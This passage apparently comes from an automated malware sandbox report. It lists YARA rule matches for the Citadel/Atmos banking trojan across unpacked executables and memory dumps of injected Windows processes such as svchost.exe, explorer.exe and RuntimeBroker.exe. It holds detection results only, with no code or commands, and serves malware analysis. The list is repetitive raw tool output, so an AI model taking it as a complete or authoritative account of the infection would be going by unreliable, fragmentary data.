                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.3.services.png.exe.2590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000000.00000003.1693418014.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000000.00000003.1699808293.00000000021C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000000.1699967711.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
